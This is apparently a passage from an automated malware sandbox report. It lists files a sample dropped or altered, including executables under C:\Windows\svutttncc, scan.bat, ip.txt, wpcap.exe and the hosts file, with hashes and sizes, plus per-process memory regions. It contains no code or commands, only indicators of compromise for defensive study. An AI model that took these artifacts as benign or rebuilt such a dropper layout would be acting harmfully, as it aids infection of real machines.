                                                        SHA256

                                                        83e3860ef40d191fc91984708a2cdf73c423b62007c7ba500d85ca962090d5c0

                                                        SHA512

                                                        2e0744ceb12e678f195b6e3a2f4529edd63f428f1282f7c5070d7bf256a3b3d8f3e761a548dbbf058707432cedabd619976f45136f9cdf04e74974874c32a86e

                                                      • C:\Windows\TEMP\svutttncc\1260.dmp

                                                        Filesize

                                                        5.2MB

                                                        MD5

                                                        d5c5f9f13db6d522606152789db562b0

                                                        SHA1

                                                        55646082f461913acb3dd569cd5cffc00cc39ec0

                                                        SHA256

                                                        9f7400ed7288eb1f1994249e4d70a8c12b1a9dfb562f220c06815b66fbb40292

                                                        SHA512

                                                        55e2ba4037b70555ad4d8d279bb10826f32c72800034a8ff1ea4e15c234984288f01fb3e988ec2a3c91561852644fcf9efe2c8fffc589a5e3306942a7e321a65

                                                      • C:\Windows\TEMP\svutttncc\1676.dmp

                                                        Filesize

                                                        3.8MB

                                                        MD5

                                                        826e1cfc5dfbb8a17a2240239f66f174

                                                        SHA1

                                                        733ecf050cfaac964be8d442ff7eb365a71de654

                                                        SHA256

                                                        54c43644077c4597b113fe10b443d834737c319bc643e6bba02b8c85ac51eb6a

                                                        SHA512

                                                        b7eb6f0c4f3f4d7d75d4dfabadc155cc9fd40fa79905b342b52acf440f435a9847f31ba05c32b6d0cf06f8b074b51a2c2aedae690b5de8caf756653654c7bee2

                                                      • C:\Windows\TEMP\svutttncc\1752.dmp

                                                        Filesize

                                                        7.2MB

                                                        MD5

                                                        f87229e78a5c61760054b35592800541

                                                        SHA1

                                                        ee72fd6cea12a1c53377cae333a2a1d3983dcf55

                                                        SHA256

                                                        bcb894dede220188568eca4ab5b525d81fa25de15d4ae0164c5cc06622b364d4

                                                        SHA512

                                                        f57600835604d3180bda23df5453d5055c216ade8bdd9ba61a38e4d8d5bc8d0d4eb7f3f1ea3ff1d1090daee633486f37a7992fbf42a6b3b32e066c25e469f597

                                                      • C:\Windows\TEMP\svutttncc\2336.dmp

                                                        Filesize

                                                        851KB

                                                        MD5

                                                        1bfe9cce98c0637885d60d299ac51888

                                                        SHA1

                                                        0a6bb18b05d8ebafe1c182faec2f94a9d657bd4f

                                                        SHA256

                                                        0d35b7582e11e96d9757abf23d354774ced4af1c1298552c06fb8dcfbaaa1e40

                                                        SHA512

                                                        a8ad775e7b2bb41f5f690fe5c54cfa2d141a1649c2cc24c78e5967d323200e6069d2538e4189b474a368d7c9799f5a1375b7af0723e84150ce6183336ae210e9

                                                      • C:\Windows\TEMP\svutttncc\276.dmp

                                                        Filesize

                                                        4.8MB

                                                        MD5

                                                        c23121f04a679d5ca0ac1c6824cdca66

                                                        SHA1

                                                        f0434fd43e2a3b5d049da0853b743c68ae897cc0

                                                        SHA256

                                                        dcb226ccaf981035540ed295e6fa178065a59560792f12e1a49f019e909c3bb3

                                                        SHA512

                                                        25bbab69353c05ab4ffbe053220a475ab48ffc64901c484a9f3f2759c1ab5624bcee1512328caad014393031be39c7c3412f51c7dcb83928e5d8971320167d74

                                                      • C:\Windows\TEMP\svutttncc\496.dmp

                                                        Filesize

                                                        2.1MB

                                                        MD5

                                                        b94cfc18fcdc988bef7c4a4cca050f1b

                                                        SHA1

                                                        6ea6de97c5773d79ac81a1516cadd858dc195bd1

                                                        SHA256

                                                        76086403cd05a4f920d577784130a36b480337637e938a56971a080ef69575ab

                                                        SHA512

                                                        e990070944d85901206043c963ae4cb48aa977b9c0291d72cabfee0de9dd17f1fad6465d4e283e0e4c386e6631cff628430adb6f200f8719f90f148bb4fa7775

                                                      • C:\Windows\svutttncc\Corporate\vfshost.exe

                                                        Filesize

                                                        381KB

                                                        MD5

                                                        fd5efccde59e94eec8bb2735aa577b2b

                                                        SHA1

                                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                                        SHA256

                                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                                        SHA512

                                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                                      • C:\Windows\svutttncc\tezuchwia\ciiebagbs.exe

                                                        Filesize

                                                        332KB

                                                        MD5

                                                        ea774c81fe7b5d9708caa278cf3f3c68

                                                        SHA1

                                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                                        SHA256

                                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                                        SHA512

                                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                                      • C:\Windows\svutttncc\tezuchwia\ip.txt

                                                        Filesize

                                                        193B

                                                        MD5

                                                        98d49dc4121ecade36a219e263cb1a0d

                                                        SHA1

                                                        0d3dd657754381c6a850e85799084eabeba010d6

                                                        SHA256

                                                        8331422a0267c5dd1e2edbad85e9fabb8c7f5eafc03cc9094e79aa6eccb6e90e

                                                        SHA512

                                                        13ae52cfcf1ae4ba5bf638ebe350944417310c5fc982602889f7ae8f3be7810399eed61a0214beb22d29c78dd8b9c6fa6ebe53eaaacf730be03756371d8ce4fd

                                                      • C:\Windows\svutttncc\tezuchwia\scan.bat

                                                        Filesize

                                                        159B

                                                        MD5

                                                        1700305871407cef966a5dac2bc2217d

                                                        SHA1

                                                        0d5a37f02e5b0ff53967a2845404d4a60092eaac

                                                        SHA256

                                                        42583ece8ed382e541d3dbe6015b2a647426c6b9bfe50366a4fb97e1ae66569d

                                                        SHA512

                                                        04cb173febe8885351250af85286aeb0188dabfe932fdeefb80610ab88c879e6cfad1ad719e78db0c8510bd3e9ba02edb14f93076785655794235825ea94b6f2

                                                      • C:\Windows\svutttncc\tezuchwia\wpcap.exe

                                                        Filesize

                                                        424KB

                                                        MD5

                                                        e9c001647c67e12666f27f9984778ad6

                                                        SHA1

                                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                                        SHA256

                                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                                        SHA512

                                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                                      • C:\Windows\system32\drivers\etc\hosts

                                                        Filesize

                                                        975B

                                                        MD5

                                                        b5d815ff5310f62de5020591be598bc0

                                                        SHA1

                                                        8013562b0cc2516d16d474308c8982a31b7f5dd0

                                                        SHA256

                                                        a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                                        SHA512

                                                        4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                                      • \Windows\Temp\nsz6847.tmp\System.dll

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        2ae993a2ffec0c137eb51c8832691bcb

                                                        SHA1

                                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                                        SHA256

                                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                                        SHA512

                                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                                      • \Windows\Temp\nsz6847.tmp\nsExec.dll

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        b648c78981c02c434d6a04d4422a6198

                                                        SHA1

                                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                                        SHA256

                                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                                        SHA512

                                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                                      • \Windows\Temp\peaalhnbi\uchlem.exe

                                                        Filesize

                                                        343KB

                                                        MD5

                                                        2b4ac7b362261cb3f6f9583751708064

                                                        SHA1

                                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                                        SHA256

                                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                                        SHA512

                                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                                      • \Windows\Temp\svutttncc\segneeyeb.exe

                                                        Filesize

                                                        126KB

                                                        MD5

                                                        e8d45731654929413d79b3818d6a5011

                                                        SHA1

                                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                                        SHA256

                                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                                        SHA512

                                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                                      • \Windows\Temp\xohudmc.exe

                                                        Filesize

                                                        72KB

                                                        MD5

                                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                                        SHA1

                                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                                        SHA256

                                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                                        SHA512

                                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                                      • \Windows\mintttbi\rslbqgb.exe

                                                        Filesize

                                                        8.9MB

                                                        MD5

                                                        b223aad4abaf054208ee30ccb75d71a7

                                                        SHA1

                                                        99ca7a556081734e23d0a03cdb07a79fb946bc3c

                                                        SHA256

                                                        47cec356399a5e0c72535203a93095aa90bf886c10f0c9dc7a5e80ec2eb8cc39

                                                        SHA512

                                                        497e3f17ac051321663dac925ce2208289a5ae5ad245d890d7d285240fdd02502a7feaf08c9b1628c772ee4f7ff46c1c2a82eef634997d99fd2e02ed8017368a

                                                      • memory/664-251-0x0000000001220000-0x0000000001232000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/672-219-0x000000013F220000-0x000000013F27B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/672-221-0x000000013F220000-0x000000013F27B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/784-159-0x000000013FA20000-0x000000013FA7B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/784-172-0x000000013FA20000-0x000000013FA7B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/792-135-0x00000000010D0000-0x00000000011BE000-memory.dmp

                                                        Filesize

                                                        952KB

                                                      • memory/792-133-0x00000000010D0000-0x00000000011BE000-memory.dmp

                                                        Filesize

                                                        952KB

                                                      • memory/836-138-0x000000013F020000-0x000000013F10E000-memory.dmp

                                                        Filesize

                                                        952KB

                                                      • memory/836-136-0x000000013F020000-0x000000013F10E000-memory.dmp

                                                        Filesize

                                                        952KB

                                                      • memory/1236-75-0x0000000000150000-0x000000000019C000-memory.dmp

                                                        Filesize

                                                        304KB

                                                      • memory/1512-192-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-239-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-252-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-168-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-261-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-230-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-263-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-259-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-238-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-170-0x00000000003D0000-0x00000000003E0000-memory.dmp

                                                        Filesize

                                                        64KB

                                                      • memory/1512-200-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1512-237-0x000000013FB20000-0x000000013FC40000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/1696-148-0x0000000010000000-0x0000000010008000-memory.dmp

                                                        Filesize

                                                        32KB

                                                      • memory/1696-174-0x0000000000400000-0x0000000000412000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/2000-250-0x0000000001220000-0x0000000001232000-memory.dmp

                                                        Filesize

                                                        72KB

                                                      • memory/2236-157-0x0000000002260000-0x00000000022BB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-236-0x0000000001170000-0x00000000011CB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-166-0x0000000002F10000-0x0000000003030000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/2236-185-0x0000000002260000-0x00000000022BB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-211-0x0000000001A30000-0x0000000001A8B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-186-0x0000000001A30000-0x0000000001A8B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-231-0x0000000001170000-0x00000000011CB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2236-189-0x0000000002F10000-0x0000000003030000-memory.dmp

                                                        Filesize

                                                        1.1MB

                                                      • memory/2236-202-0x0000000001A30000-0x0000000001A8B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2484-9-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                        Filesize

                                                        6.6MB

                                                      • memory/2504-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                        Filesize

                                                        6.6MB

                                                      • memory/2504-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                        Filesize

                                                        6.6MB

                                                      • memory/2588-214-0x000000013F130000-0x000000013F18B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2604-207-0x000000013FCA0000-0x000000013FCFB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2604-205-0x000000013FCA0000-0x000000013FCFB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2684-198-0x000000013F970000-0x000000013F9CB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2684-196-0x000000013F970000-0x000000013F9CB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2700-190-0x000000013F2E0000-0x000000013F33B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2700-187-0x000000013F2E0000-0x000000013F33B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2880-232-0x000000013F090000-0x000000013F0EB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2880-234-0x000000013F090000-0x000000013F0EB000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2956-180-0x000000013FDD0000-0x000000013FE2B000-memory.dmp

                                                        Filesize

                                                        364KB

                                                      • memory/2956-178-0x000000013FDD0000-0x000000013FE2B000-memory.dmp

                                                        Filesize

                                                        364KB